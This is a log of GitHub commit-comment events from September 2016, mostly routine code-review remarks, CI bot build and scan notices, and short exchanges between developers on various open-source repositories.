{"id":"4509953069","type":"CommitCommentEvent","actor":{"login":"fidley"},"repo":{"name":"ivanfemia/abap2xlsx"},"payload":{"comment":{"id":18884520,"position":null,"line":null,"path":null,"commit_id":"5251e4a4ae7cfc4a89685915c5149970638343cc","created_at":"2016-09-02T18:12:41Z","updated_at":"2016-09-02T18:12:41Z","body":"We will meet , thats 100% sure :)"}},"created_at":"2016-09-02T18:12:41Z"}
{"id":"4509954139","type":"CommitCommentEvent","actor":{"login":"bhroam"},"repo":{"name":"PBSPro/pbspro"},"payload":{"comment":{"id":18884523,"position":20,"line":15,"path":"test/tests/pbs_Rrecord_resources_used.py","commit_id":"eb7b51c44d196fdaa4108c54f8e976243c967a4b","created_at":"2016-09-02T18:12:55Z","updated_at":"2016-09-02T18:12:55Z","body":"Sorry about not being clear on this.  According to the email Sarita sent out, each class/test needs one docstring right after the definition that describes the test.  All other comments should use the # symbol."}},"created_at":"2016-09-02T18:12:55Z"}
{"id":"4509957262","type":"CommitCommentEvent","actor":{"login":"manandbytes"},"repo":{"name":"dimitri/el-get"},"payload":{"comment":{"id":18884528,"position":7,"line":27,"path":"el-get-methods.el","commit_id":"acdcb6e5b2e86e401f3e1738723a40a5f2b654c5","created_at":"2016-09-02T18:13:37Z","updated_at":"2016-09-02T18:13:37Z","body":"Could someone elaborate what sort of URLs are valid when starting with `username@`?"}},"created_at":"2016-09-02T18:13:37Z"}
{"id":"4509958610","type":"CommitCommentEvent","actor":{"login":"mayank-phadke"},"repo":{"name":"dietms/dietms.github.io"},"payload":{"comment":{"id":18884530,"position":null,"line":null,"path":null,"commit_id":"43f4c8ca9c68fb6ef72468ca3e78da6bf0406551","created_at":"2016-09-02T18:13:54Z","updated_at":"2016-09-02T18:13:54Z","body":"pic not visible?"}},"created_at":"2016-09-02T18:13:54Z"}
{"id":"4509959034","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/yokozuna"},"payload":{"comment":{"id":18884532,"position":null,"line":null,"path":null,"commit_id":"b35204de2256f0397094dffa9ca4b36cf92e7363","created_at":"2016-09-02T18:13:59Z","updated_at":"2016-09-02T18:13:59Z","body":"all tests pass:\nsuccess: http://buildbot.bos1/builders/test-yokozuna/builds/1911\n"}},"created_at":"2016-09-02T18:13:59Z"}
{"id":"4509963478","type":"CommitCommentEvent","actor":{"login":"aditya-konarde"},"repo":{"name":"dietms/dietms.github.io"},"payload":{"comment":{"id":18884544,"position":null,"line":null,"path":null,"commit_id":"43f4c8ca9c68fb6ef72468ca3e78da6bf0406551","created_at":"2016-09-02T18:14:55Z","updated_at":"2016-09-02T18:14:55Z","body":"I'll check. wait.\n\nOn Fri, Sep 2, 2016, 11:43 PM mayank-phadke <notifications@github.com>\nwrote:\n\n> pic not visible?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/dietms/dietms.github.io/commit/43f4c8ca9c68fb6ef72468ca3e78da6bf0406551#commitcomment-18884530>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AGBoVOvob9ZKaYCqFN_tfaUT1Uy4wm1qks5qmGdigaJpZM4Jz9Ud>\n> .\n>\n"}},"created_at":"2016-09-02T18:14:55Z"}
{"id":"4509965242","type":"CommitCommentEvent","actor":{"login":"matthewmorek"},"repo":{"name":"matthewmorek/wfp-jpo-country"},"payload":{"comment":{"id":18884548,"position":42,"line":97,"path":"index.html","commit_id":"7a2154da5b1d77c021e54b781039b17b3f8775f6","created_at":"2016-09-02T18:15:19Z","updated_at":"2016-09-02T18:15:19Z","body":"The markup for this panel could be a little clearer. There's no need for an additional container with a class `aside`, when we can use a native `aside` element. We can also improve the spacing to stay more consistent across different breakpoints, by using a mix of `padding` and `margin` micro-classes."}},"created_at":"2016-09-02T18:15:19Z"}
{"id":"4509967227","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog-ui"},"payload":{"comment":{"id":18884551,"position":null,"line":null,"path":null,"commit_id":"9b384cd2f03ac766e0ec0c544b395f496cc752dc","created_at":"2016-09-02T18:15:44Z","updated_at":"2016-09-02T18:15:44Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#T6JipMiOSxKzObMx6oyjsA"}},"created_at":"2016-09-02T18:15:44Z"}
{"id":"4509967556","type":"CommitCommentEvent","actor":{"login":"drequil"},"repo":{"name":"drequil/iGoatWeb"},"payload":{"comment":{"id":18884552,"position":null,"line":null,"path":null,"commit_id":"eb6694b1963de0f5a83a587c948f3edf5b386f44","created_at":"2016-09-02T18:15:48Z","updated_at":"2016-09-02T18:15:48Z","body":"Checkmarx scan results 02 Sep 2016 13:15 UTC -05:00\r\n<table>\r\n<thead>\r\n<tr>\r\n<th></th>\r\n<th>High</th>\r\n<th>Medium</th>\r\n<th>Low</th>\r\n<th>Info</th>\r\n</tr>\r\n</thead>\r\n<tbody>\r\n<tr>\r\n<td><b>New</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n<tr>\r\n<td><b>Recurrent</b></td>\r\n<td align=\"center\">27</td>\r\n<td align=\"center\">32</td>\r\n<td align=\"center\">6</td>\r\n<td align=\"center\">4</td>\r\n</tr>\r\n<tr>\r\n<td><b>Fixed</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href= \"http://ANDRE-T440P/CxWebClient/ViewerMain.aspx?scanid=1080220&projectid=30065\"> Open Viewer</a>\r\n<b>Included commits</b><table><tr><th>Commit ID</th><th>Owner</th></tr><tr><td><a href=\"https://github.com/drequil/iGoatWeb/commit/eb6694b1963de0f5a83a587c948f3edf5b386f44\">eb6694b1963de0f5a83a587c948f3edf5b386f44</a></td><td>@drequil</td></tr></table>\r\n"}},"created_at":"2016-09-02T18:15:48Z"}
{"id":"4509970981","type":"CommitCommentEvent","actor":{"login":"tonyskapunk"},"repo":{"name":"tonyskapunk/kthresher"},"payload":{"comment":{"id":18884563,"position":null,"line":null,"path":null,"commit_id":"5129afb2c90a3463f5c7993d9b3607a87558b902","created_at":"2016-09-02T18:16:34Z","updated_at":"2016-09-02T18:16:34Z","body":"Sure thing, thanks for the reminder, I noticed that the way we have the drone config forces to only build against tags, I have set it up to only build through tags and last test succeeded so I expect it will do so once I merge and set the tag."}},"created_at":"2016-09-02T18:16:34Z"}
{"id":"4509974316","type":"CommitCommentEvent","actor":{"login":"matthewmorek"},"repo":{"name":"matthewmorek/wfp-jpo-country"},"payload":{"comment":{"id":18884573,"position":44,"line":99,"path":"index.html","commit_id":"7a2154da5b1d77c021e54b781039b17b3f8775f6","created_at":"2016-09-02T18:17:17Z","updated_at":"2016-09-02T18:17:17Z","body":"Instead of treating an image as a separate element, it could become a part of the heading, and its custom class replaced by relevant micro-classes, `.fl` and `.mr3`."}},"created_at":"2016-09-02T18:17:17Z"}
{"id":"4509974697","type":"CommitCommentEvent","actor":{"login":"leastprivilege"},"repo":{"name":"IdentityServer/IdentityServer4"},"payload":{"comment":{"id":18884574,"position":null,"line":null,"path":null,"commit_id":"a6ebaddc0e1ee02be8e5e182cee8fac0c6f2058f","created_at":"2016-09-02T18:17:22Z","updated_at":"2016-09-02T18:17:22Z","body":"It's gone again ;p\r\n"}},"created_at":"2016-09-02T18:17:22Z"}
{"id":"4509975860","type":"CommitCommentEvent","actor":{"login":"bterlson"},"repo":{"name":"bterlson/ecmarkup"},"payload":{"comment":{"id":18884575,"position":33,"line":53,"path":"package.json","commit_id":"f47d6587f3768d253abbdad88a990d86244a4952","created_at":"2016-09-02T18:17:38Z","updated_at":"2016-09-02T18:17:38Z","body":"yikes, I don't know how that happened... of course it's not a dev dependency. Will fix immediately, thanks!"}},"created_at":"2016-09-02T18:17:38Z"}
{"id":"4509976393","type":"CommitCommentEvent","actor":{"login":"lioncash"},"repo":{"name":"MerryMage/dynarmic"},"payload":{"comment":{"id":18884579,"position":null,"line":null,"path":null,"commit_id":"e8764c129ff87d1ef690afd83caa72ad04f478bc","created_at":"2016-09-02T18:17:46Z","updated_at":"2016-09-02T18:17:46Z","body":"If you want to make it simpler/more generic, you can just do\r\n\r\n```cpp\r\ntemplate <typename Integral>\r\ninline size_t BitCount(Integral value) {\r\n    static_assert(std::is_integral<Integral>(), \"Supplied type must be an integral type.\");\r\n    return std::bitset<BitSize<Integral>()>(value).count();\r\n}\r\n```\r\n\r\nwhich will resolve to `popcnt` on supported architectures: [example](https://godbolt.org/g/b8MEOA)"}},"created_at":"2016-09-02T18:17:46Z"}
{"id":"4509977151","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog"},"payload":{"comment":{"id":18884583,"position":null,"line":null,"path":null,"commit_id":"0ef444ac3060c4a4a33be53e6a8a638ad870cbd8","created_at":"2016-09-02T18:17:56Z","updated_at":"2016-09-02T18:17:56Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#DBBz4fbVQjawbkVDzZdWMw"}},"created_at":"2016-09-02T18:17:56Z"}
{"id":"4509977658","type":"CommitCommentEvent","actor":{"login":"mortenson"},"repo":{"name":"acquia/df"},"payload":{"comment":{"id":18884585,"position":7,"line":153,"path":"composer.json","commit_id":"302b4d9b754135c158fe4c392e9bbb7d001cd2bc","created_at":"2016-09-02T18:18:03Z","updated_at":"2016-09-02T18:18:03Z","body":"Donezos"}},"created_at":"2016-09-02T18:18:03Z"}
{"id":"4509978262","type":"CommitCommentEvent","actor":{"login":"brockallen"},"repo":{"name":"IdentityServer/IdentityServer4"},"payload":{"comment":{"id":18884586,"position":null,"line":null,"path":null,"commit_id":"a6ebaddc0e1ee02be8e5e182cee8fac0c6f2058f","created_at":"2016-09-02T18:18:11Z","updated_at":"2016-09-02T18:18:11Z","body":"Just like everything else in ASP.NET Core during betas...."}},"created_at":"2016-09-02T18:18:11Z"}
{"id":"4509979630","type":"CommitCommentEvent","actor":{"login":"matthewmorek"},"repo":{"name":"matthewmorek/wfp-jpo-country"},"payload":{"comment":{"id":18884587,"position":45,"line":100,"path":"index.html","commit_id":"7a2154da5b1d77c021e54b781039b17b3f8775f6","created_at":"2016-09-02T18:18:29Z","updated_at":"2016-09-02T18:18:29Z","body":"By using a `span` inside the heading, we can control a bit better how the text will behave next to a floated image, by applying `vertical-align` directly to it."}},"created_at":"2016-09-02T18:18:29Z"}
{"id":"4509980454","type":"CommitCommentEvent","actor":{"login":"mayank-phadke"},"repo":{"name":"dietms/dietms.github.io"},"payload":{"comment":{"id":18884590,"position":null,"line":null,"path":null,"commit_id":"43f4c8ca9c68fb6ef72468ca3e78da6bf0406551","created_at":"2016-09-02T18:18:40Z","updated_at":"2016-09-02T18:18:40Z","body":"i sent pull request"}},"created_at":"2016-09-02T18:18:40Z"}
{"id":"4509985411","type":"CommitCommentEvent","actor":{"login":"matthewmorek"},"repo":{"name":"matthewmorek/wfp-jpo-country"},"payload":{"comment":{"id":18884600,"position":46,"line":101,"path":"index.html","commit_id":"7a2154da5b1d77c021e54b781039b17b3f8775f6","created_at":"2016-09-02T18:19:40Z","updated_at":"2016-09-02T18:19:40Z","body":"By default, `span` is an inline element, and as such is not suitable to contain large amounts of content. It should be replaced with `p` or a `div` instead."}},"created_at":"2016-09-02T18:19:40Z"}
{"id":"4509987102","type":"CommitCommentEvent","actor":{"login":"RafaelCintron"},"repo":{"name":"w3c/webvr"},"payload":{"comment":{"id":18884607,"position":299,"line":489,"path":"index.bs","commit_id":"7a64a4f378409af4baf8db6ba6ed970f4e44d49c","created_at":"2016-09-02T18:20:02Z","updated_at":"2016-09-02T18:20:02Z","body":"I would prefer that this matrix continue to be a true view matrix, not an eye location matrix. ."}},"created_at":"2016-09-02T18:20:02Z"}
{"id":"4509992102","type":"CommitCommentEvent","actor":{"login":"strk"},"repo":{"name":"CartoDB/Windshaft"},"payload":{"comment":{"id":18884612,"position":null,"line":null,"path":null,"commit_id":"3f28ae7099c338afe072c39724cdf2e6f868bd25","created_at":"2016-09-02T18:21:04Z","updated_at":"2016-09-02T18:21:04Z","body":"What's the new way of profiling ? Is it documented anywhere ?"}},"created_at":"2016-09-02T18:21:04Z"}
{"id":"4509995679","type":"CommitCommentEvent","actor":{"login":"btmills"},"repo":{"name":"ljharb/eslint"},"payload":{"comment":{"id":18884621,"position":23,"line":94,"path":"lib/rules/max-statements-per-line.js","commit_id":"8f452284dcf94aafcbddce870b91eba9c3dea26b","created_at":"2016-09-02T18:21:48Z","updated_at":"2016-09-02T18:21:48Z","body":"@ljharb what if:\r\n\r\n- Create another variable, `let firstExtraStatement = null;` right below [line 42](https://github.com/ljharb/eslint/commit/8f452284dcf94aafcbddce870b91eba9c3dea26b#diff-ac5bca04c41bcbc58e9524665f8b4bd8R42).\r\n- Instead of reporting here, save `firstExtraStatement = node;`.\r\n- Report when the traversal goes to the next line, report before [lines 88](https://github.com/ljharb/eslint/commit/8f452284dcf94aafcbddce870b91eba9c3dea26b#diff-ac5bca04c41bcbc58e9524665f8b4bd8R88) [and 109](https://github.com/ljharb/eslint/commit/8f452284dcf94aafcbddce870b91eba9c3dea26b#diff-ac5bca04c41bcbc58e9524665f8b4bd8R109), passing `firstExtraStatement` as the node.\r\n- After reporting, clear `firstExtraStatement`.\r\n- Add a `Program:exit` handler that would report one more time if `firstExtraStatement` is truthy. This would handle the case where the last line has too many statements, and there aren't any statements later on to trigger the report.\r\n- Perhaps extract reporting and clearing `firstExtraStatement` into a helper to consolidate that behavior.\r\n\r\nThis would delay reporting until all statements on a line have been counted, but it would still report the location of the first extra node.\r\n\r\nWould that work?"}},"created_at":"2016-09-02T18:21:48Z"}
{"id":"4509996675","type":"CommitCommentEvent","actor":{"login":"diraol"},"repo":{"name":"kytos/python-openflow"},"payload":{"comment":{"id":18884623,"position":18,"line":16,"path":"pyof/v0x02/common/header.py","commit_id":"1634da3868961c14d57062ee8c207bdbcc70148f","created_at":"2016-09-02T18:22:01Z","updated_at":"2016-09-02T18:22:01Z","body":"@cemsbr We have a problem here.\r\n\r\nWe are loosing the 'parent class' __odered__ attribute. So, if you do:\r\n\r\n```python3\r\n>>> from pyof.v0x02.commom.header import Header\r\n>>> h = Header()\r\n>>> h.get_size()\r\n1\r\n>>> h.__ordered__\r\nOrderedDict([('version', pyof.v0x01.foundation.basic_types.UBInt8)])\r\n```\r\n\r\nI can see two solutions here.\r\nThe first one is to implement the class again from the ground.\r\nThe second one is to override the __ordered__ object.\r\nThe third one is to rewrite the MetaStruct class to consider inheritance cases."}},"created_at":"2016-09-02T18:22:01Z"}
{"id":"4510000917","type":"CommitCommentEvent","actor":{"login":"brockallen"},"repo":{"name":"IdentityServer/IdentityServer4"},"payload":{"comment":{"id":18884632,"position":null,"line":null,"path":null,"commit_id":"a6ebaddc0e1ee02be8e5e182cee8fac0c6f2058f","created_at":"2016-09-02T18:22:55Z","updated_at":"2016-09-02T18:22:55Z","body":"Gone: https://github.com/IdentityServer/IdentityServer4/commit/8fa15b36f67196cb31c7eada7b3a89a3e9ce23ac"}},"created_at":"2016-09-02T18:22:55Z"}
{"id":"4510001627","type":"CommitCommentEvent","actor":{"login":"aditya-konarde"},"repo":{"name":"dietms/dietms.github.io"},"payload":{"comment":{"id":18884635,"position":null,"line":null,"path":null,"commit_id":"43f4c8ca9c68fb6ef72468ca3e78da6bf0406551","created_at":"2016-09-02T18:23:05Z","updated_at":"2016-09-02T18:23:05Z","body":"Merged. Image issue fixed"}},"created_at":"2016-09-02T18:23:05Z"}
{"id":"4510003104","type":"CommitCommentEvent","actor":{"login":"Zodzie"},"repo":{"name":"mozilla/BrowserQuest"},"payload":{"comment":{"id":18884638,"position":null,"line":null,"path":null,"commit_id":"af32d247cac3495ca430d0effbb88dd5f3250b2c","created_at":"2016-09-02T18:23:23Z","updated_at":"2016-09-02T18:23:23Z","body":"@THENEWGAMECREATOR  http://browserquest.mozilla.org/ loads and connects for me over port 80. Maybe you have some type of parental filter"}},"created_at":"2016-09-02T18:23:23Z"}
{"id":"4510004063","type":"CommitCommentEvent","actor":{"login":"turol"},"repo":{"name":"assimp/assimp"},"payload":{"comment":{"id":18884640,"position":6,"line":126,"path":"code/BlenderIntermediate.h","commit_id":"b240b9d30dae43fff8009aceefbd0b0c4b8ec613","created_at":"2016-09-02T18:23:37Z","updated_at":"2016-09-02T18:23:37Z","body":"strncmp can return any negative value, not just -1."}},"created_at":"2016-09-02T18:23:37Z"}
{"id":"4510005828","type":"CommitCommentEvent","actor":{"login":"Floessie"},"repo":{"name":"Beep6581/RawTherapee"},"payload":{"comment":{"id":18884642,"position":4,"line":33,"path":"rtengine/color.h","commit_id":"d31de41f68cfcb9c3f5043987fdba0d882eed550","created_at":"2016-09-02T18:24:01Z","updated_at":"2016-09-02T18:24:01Z","body":"No, just keep it, if it's right for you. It's just a matter of taste. Not everyone has a powerful IDE when staring at the code ... :)"}},"created_at":"2016-09-02T18:24:01Z"}
{"id":"4510005992","type":"CommitCommentEvent","actor":{"login":"dmcassel"},"repo":{"name":"marklogic/RunDMC"},"payload":{"comment":{"id":18884643,"position":null,"line":null,"path":null,"commit_id":"2e326f030158c3d30e356a72f60dbb379d1014c3","created_at":"2016-09-02T18:24:03Z","updated_at":"2016-09-02T18:24:03Z","body":"@paxtonhare The bug this is supposed to fix is still open. Can this be merged in? "}},"created_at":"2016-09-02T18:24:03Z"}
{"id":"4510013595","type":"CommitCommentEvent","actor":{"login":"Stav1472"},"repo":{"name":"SpartanRefactoring/spartan-refactoring"},"payload":{"comment":{"id":18884660,"position":null,"line":null,"path":null,"commit_id":"d794efad94f5589d7ddaba73330e4cf0e0c60118","created_at":"2016-09-02T18:25:42Z","updated_at":"2016-09-02T18:25:42Z","body":"i uploaded a newer version of the wring that puts paretnthesis in this case."}},"created_at":"2016-09-02T18:25:42Z"}
{"id":"4510014133","type":"CommitCommentEvent","actor":{"login":"jakdemir"},"repo":{"name":"ApolloPonos/workplace"},"payload":{"comment":{"id":18884664,"position":1,"line":1,"path":"Ornek/edu/racket/intro/advancedControlAndAnimationCases.java","commit_id":"16905f75e5b3c61df162a534c1467615b6a5659c","created_at":"2016-09-02T18:25:49Z","updated_at":"2016-09-02T18:25:49Z","body":"File extension should be rkt for these Racket programs. https://docs.racket-lang.org/drracket/drracket-files.html"}},"created_at":"2016-09-02T18:25:49Z"}
{"id":"4510015053","type":"CommitCommentEvent","actor":{"login":"RafaelCintron"},"repo":{"name":"w3c/webvr"},"payload":{"comment":{"id":18884669,"position":335,"line":536,"path":"index.bs","commit_id":"7a64a4f378409af4baf8db6ba6ed970f4e44d49c","created_at":"2016-09-02T18:26:01Z","updated_at":"2016-09-02T18:26:01Z","body":"Instead of encouraging people to do frustum culling with the FOV, I would prefer that we have them use the projection matrix itself.  I believe the math should be possible and the developer will get correct culling instead of \"conservative\" culling."}},"created_at":"2016-09-02T18:26:01Z"}
{"id":"4510015117","type":"CommitCommentEvent","actor":{"login":"gorous"},"repo":{"name":"gorous/TestePontotel2"},"payload":{"comment":{"id":18884670,"position":null,"line":null,"path":null,"commit_id":"1897e283d872f56cc417defe1b8d4c3053490ebe","created_at":"2016-09-02T18:26:02Z","updated_at":"2016-09-02T18:26:02Z","body":"Teste Pontotel"}},"created_at":"2016-09-02T18:26:02Z"}
{"id":"4510015365","type":"CommitCommentEvent","actor":{"login":"floatingatoll"},"repo":{"name":"mozilla/http-observatory"},"payload":{"comment":{"id":18884672,"position":5,"line":113,"path":"httpobs/website/api.py","commit_id":"bea0479c3aa8cc095420cf99dbe178d64f48d3e3","created_at":"2016-09-02T18:26:05Z","updated_at":"2016-09-02T18:26:05Z","body":"Consider a reference to ```schema.sql``` here with a note that mentions the Postgres ```SERIAL``` column type, so that it's more readily discovered in the future if someone's swapping out databases and greps for SERIAL."}},"created_at":"2016-09-02T18:26:05Z"}
{"id":"4510016951","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/yokozuna"},"payload":{"comment":{"id":18884675,"position":null,"line":null,"path":null,"commit_id":"b35204de2256f0397094dffa9ca4b36cf92e7363","created_at":"2016-09-02T18:26:23Z","updated_at":"2016-09-02T18:26:23Z","body":"fast-forwarding develop-2.2 to borshop-integration-658-feature-zl-hll_datatypes = 2bb920ae"}},"created_at":"2016-09-02T18:26:23Z"}
{"id":"4510017049","type":"CommitCommentEvent","actor":{"login":"satishvjadhav"},"repo":{"name":"satishvjadhav/GitHub-learning"},"payload":{"comment":{"id":18884676,"position":null,"line":null,"path":null,"commit_id":"382a26437142b20c96c7be8e3d3f360a60723eb9","created_at":"2016-09-02T18:26:24Z","updated_at":"2016-09-02T18:26:24Z","body":"Initial Commit"}},"created_at":"2016-09-02T18:26:24Z"}
{"id":"4510020021","type":"CommitCommentEvent","actor":{"login":"jakdemir"},"repo":{"name":"ApolloPonos/workplace"},"payload":{"comment":{"id":18884682,"position":1,"line":1,"path":"Ornek/edu/racket/intro/recursion2.java","commit_id":"16905f75e5b3c61df162a534c1467615b6a5659c","created_at":"2016-09-02T18:27:05Z","updated_at":"2016-09-02T18:27:05Z","body":"Nice, could you add comments?"}},"created_at":"2016-09-02T18:27:05Z"}
{"id":"4510024848","type":"CommitCommentEvent","actor":{"login":"ApolloPonos"},"repo":{"name":"ApolloPonos/workplace"},"payload":{"comment":{"id":18884705,"position":1,"line":1,"path":"Ornek/edu/racket/intro/advancedControlAndAnimationCases.java","commit_id":"16905f75e5b3c61df162a534c1467615b6a5659c","created_at":"2016-09-02T18:28:08Z","updated_at":"2016-09-02T18:28:08Z","body":"İlgilenecegim abicim.\n\n2 Eyl 2016 21:25 tarihinde \"Jak Akdemir\" <notifications@github.com> yazdı:\n\n> File extension should be rkt for these Racket programs.\n> https://docs.racket-lang.org/drracket/drracket-files.html\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ApolloPonos/workplace/commit/16905f75e5b3c61df162a534c1467615b6a5659c#commitcomment-18884664>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ARm7S0E5WPdi4emWhSyQpd251Aa_CyDqks5qmGotgaJpZM4Jz99n>\n> .\n>\n"}},"created_at":"2016-09-02T18:28:08Z"}
{"id":"4510031400","type":"CommitCommentEvent","actor":{"login":"matthewmorek"},"repo":{"name":"matthewmorek/wfp-jpo-country"},"payload":{"comment":{"id":18884720,"position":62,"line":111,"path":"index.html","commit_id":"7a2154da5b1d77c021e54b781039b17b3f8775f6","created_at":"2016-09-02T18:29:32Z","updated_at":"2016-09-02T18:29:32Z","body":"Since this is just a container, there's no need to use additional `padding`, and instead we could use an equal vertical `margin`, to offset it."}},"created_at":"2016-09-02T18:29:32Z"}
{"id":"4510033563","type":"CommitCommentEvent","actor":{"login":"Nechrito"},"repo":{"name":"LeagueSharp-Devs/LeagueSharp.SDKEx"},"payload":{"comment":{"id":18884728,"position":null,"line":null,"path":null,"commit_id":"c3d2c560fcaa87cc08f9f96c698c7746707404e1","created_at":"2016-09-02T18:30:00Z","updated_at":"2016-09-02T18:30:00Z","body":":Klappa:\r\nnow change riven Q AA to 245 (230 min but sometimes buggy)"}},"created_at":"2016-09-02T18:30:00Z"}
{"id":"4510033609","type":"CommitCommentEvent","actor":{"login":"antonyRoberts"},"repo":{"name":"angular/material2"},"payload":{"comment":{"id":18884729,"position":null,"line":null,"path":null,"commit_id":"3ef7ece69f114be9dd01e908089d2e0765d25727","created_at":"2016-09-02T18:30:01Z","updated_at":"2016-09-02T18:30:01Z","body":"@fxck Great idea, I think this will prove to be helpful to a lot of people, it's nice to have a central repository instead of having to dig around to see why what you think should work doesn't, or worse seeing the same questions asked a dozen times. @jelbourn @kara and @hansl I really appreciate the additional steps you guys appear to have agreed to undertake, you guys are awesome."}},"created_at":"2016-09-02T18:30:01Z"}
{"id":"4510035002","type":"CommitCommentEvent","actor":{"login":"jhendrixMSFT"},"repo":{"name":"jhendrixMSFT/roslyn"},"payload":{"comment":{"id":18884735,"position":28,"line":28,"path":"bootstrap.ps1","commit_id":"ec194ee1f44c3bcabdea3f04e917ed3168ec8ea6","created_at":"2016-09-02T18:30:19Z","updated_at":"2016-09-02T18:30:19Z","body":"We can check the value in $LastExitCode, I will make this change."}},"created_at":"2016-09-02T18:30:19Z"}
{"id":"4510035743","type":"CommitCommentEvent","actor":{"login":"pattacini"},"repo":{"name":"robotology/icub-main"},"payload":{"comment":{"id":18884737,"position":null,"line":null,"path":null,"commit_id":"14985b3a2ff665f8f27d084a3cfa60ced8270ad5","created_at":"2016-09-02T18:30:27Z","updated_at":"2016-09-02T18:30:27Z","body":"@drdanz what's the purpose of this cmake variable?\r\n\r\nI'm asking because we have the same type of modules also in other repo, e.g. `cer`, `haptic-devices`, and thus I'd like to keep those up-to-date at my best."}},"created_at":"2016-09-02T18:30:27Z"}
{"id":"4510035799","type":"CommitCommentEvent","actor":{"login":"jakdemir"},"repo":{"name":"ApolloPonos/workplace"},"payload":{"comment":{"id":18884738,"position":14,"line":14,"path":"Ornek/edu/java/hackerrank/IntroductionQuestion8.java","commit_id":"16905f75e5b3c61df162a534c1467615b6a5659c","created_at":"2016-09-02T18:30:27Z","updated_at":"2016-09-02T18:30:27Z","body":"what's this?"}},"created_at":"2016-09-02T18:30:27Z"}
{"id":"4510036695","type":"CommitCommentEvent","actor":{"login":"bterlson"},"repo":{"name":"bterlson/ecmarkup"},"payload":{"comment":{"id":18884740,"position":33,"line":53,"path":"package.json","commit_id":"f47d6587f3768d253abbdad88a990d86244a4952","created_at":"2016-09-02T18:30:38Z","updated_at":"2016-09-02T18:30:38Z","body":"@mmun sorry about that, should be fixed now."}},"created_at":"2016-09-02T18:30:38Z"}
{"id":"4510038835","type":"CommitCommentEvent","actor":{"login":"matthewmorek"},"repo":{"name":"matthewmorek/wfp-jpo-country"},"payload":{"comment":{"id":18884748,"position":67,"line":115,"path":"index.html","commit_id":"7a2154da5b1d77c021e54b781039b17b3f8775f6","created_at":"2016-09-02T18:31:05Z","updated_at":"2016-09-02T18:31:05Z","body":"When a breakpoint goes above the `max-width` of the main container we should reset horizontal `padding`, which was added only to boost content spacing on smaller screens."}},"created_at":"2016-09-02T18:31:05Z"}
{"id":"4510042119","type":"CommitCommentEvent","actor":{"login":"tcourdy"},"repo":{"name":"hci-gnomex/gnomex"},"payload":{"comment":{"id":18884763,"position":38,"line":231,"path":"src/hci/gnomex/controller/GetRequestList.java","commit_id":"3989d35b50d78c1cf64c09d5b4863cf0829ecab3","created_at":"2016-09-02T18:31:47Z","updated_at":"2016-09-02T18:31:47Z","body":"I'm going to change this to Integer.MAX_VALUE so in the future there isn't any confusion as to why we chose the number that you put in.  Unless you noticed something in particular with that value then we can revert my change.  Thanks."}},"created_at":"2016-09-02T18:31:47Z"}
{"id":"4510042608","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18884764,"position":null,"line":null,"path":null,"commit_id":"811ba74ff6b19cfc8101a201b86a29e1e564f064","created_at":"2016-09-02T18:31:54Z","updated_at":"2016-09-02T18:31:54Z","body":"113835831-Source-Temp-Not-Reporting (RKStrand) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-811ba74ff6b19cfc8101a201b86a29e1e564f064-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-02T18:31:54Z"}
{"id":"4510046261","type":"CommitCommentEvent","actor":{"login":"matthewmorek"},"repo":{"name":"matthewmorek/wfp-jpo-country"},"payload":{"comment":{"id":18884773,"position":76,"line":132,"path":"index.html","commit_id":"7a2154da5b1d77c021e54b781039b17b3f8775f6","created_at":"2016-09-02T18:32:43Z","updated_at":"2016-09-02T18:32:43Z","body":"Since there's just one button per listing, on smaller screens it should fill up space to improve tap targets and maintain layout balance."}},"created_at":"2016-09-02T18:32:43Z"}
{"id":"4510051485","type":"CommitCommentEvent","actor":{"login":"matthewmorek"},"repo":{"name":"matthewmorek/wfp-jpo-country"},"payload":{"comment":{"id":18884781,"position":89,"line":149,"path":"index.html","commit_id":"7a2154da5b1d77c021e54b781039b17b3f8775f6","created_at":"2016-09-02T18:33:48Z","updated_at":"2016-09-02T18:33:48Z","body":"Adjust `padding` on the footer wrapper, to maintain consistency with other templates."}},"created_at":"2016-09-02T18:33:48Z"}
{"id":"4510052323","type":"CommitCommentEvent","actor":{"login":"fuqiuyu"},"repo":{"name":"fuqiuyu/monsterGame"},"payload":{"comment":{"id":18884782,"position":null,"line":null,"path":null,"commit_id":"b72882414e076815f582e98e1abaed80c3c722c5","created_at":"2016-09-02T18:34:00Z","updated_at":"2016-09-02T18:34:00Z","body":"hello"}},"created_at":"2016-09-02T18:34:00Z"}
{"id":"4510052357","type":"CommitCommentEvent","actor":{"login":"toji"},"repo":{"name":"w3c/webvr"},"payload":{"comment":{"id":18884783,"position":335,"line":536,"path":"index.bs","commit_id":"7a64a4f378409af4baf8db6ba6ed970f4e44d49c","created_at":"2016-09-02T18:34:00Z","updated_at":"2016-09-02T18:34:00Z","body":"Fair enough, as long as you're certain that the Win Holographic projection matrices are convertible to FOV. Even if we deprecate it though we won't be removing it for V1, though. It's a backwards compatibility issue."}},"created_at":"2016-09-02T18:34:00Z"}
